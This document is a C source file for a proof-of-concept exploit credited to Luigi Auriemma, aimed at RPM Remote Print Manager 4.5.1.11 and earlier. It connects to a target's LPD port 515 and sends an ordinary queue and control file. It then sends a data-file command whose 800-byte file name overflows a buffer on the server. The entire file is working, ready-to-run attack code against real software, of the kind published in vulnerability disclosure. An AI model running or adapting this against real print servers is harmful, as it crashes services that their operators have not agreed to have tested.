/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define ONESEC  1000
    #define sleep   Sleep
    #define sleepms(x)  sleep(x)
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    #define ONESEC  1
    #define sleepms(x)  usleep(x * 1000)
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER     "0.1"
#define PORT    515
#define BUFFSZ  4096
#define BOFSZ   800



int lpd_sendrecv(int sd, u8 *msg, u8 *cmd, int cmdlen, u8 *data, int datalen);
int putss(u8 *data, u8 *str);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len;
    u8      buff[BUFFSZ],
            cmd[BUFFSZ],
            fname[BUFFSZ],
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "RPM Remote Print Manager <= 4.5.1.11 unicode buffer-overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host>\n"
            "\n", argv[0]);
        exit(1);
    }

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(PORT);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
     < 0) std_err();

    len = sprintf(cmd, "\x02" "queue\n");
    if(lpd_sendrecv(sd, "queue name", cmd, len, NULL, 0) < 0) goto quit;

    p = buff;
    p += putss(p, "J" "jobname\n");    // not needed
    len = sprintf(cmd, "\x02" "%d cfA001X\n", p - buff);
    if(lpd_sendrecv(sd, "control file", cmd, len, buff, p - buff) < 0) goto quit;

    memset(fname, 'a', BOFSZ);
    fname[BOFSZ] = 0;

    p = buff;
    p += putss(p, "content of the file");
    len = sprintf(cmd, "\x03" "%d dfA001X%s\n", p - buff, fname);
    if(lpd_sendrecv(sd, "malformed data file", cmd, len, buff, p - buff) < 0) goto quit;

quit:
    close(sd);
    printf("- finished\n");
    return(0);
}



int lpd_sendrecv(int sd, u8 *msg, u8 *cmd, int cmdlen, u8 *data, int datalen) {
    u8      buff[BUFFSZ];

    printf("- send %s\n", msg);
    send(sd, cmd, cmdlen, 0);
    if(data) {
        send(sd, data, datalen, 0);
        send(sd, "", 1, 0);
    }
    if(timeout(sd, 5) < 0) return(-1);  // only a simple recv, no need to check data
    if(recv(sd, buff, BUFFSZ, 0) <= 0) return(-1);
    return(0);
}



int putss(u8 *data, u8 *str) {
    int     len;

    len = strlen(str);
    memcpy(data, str, len);
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


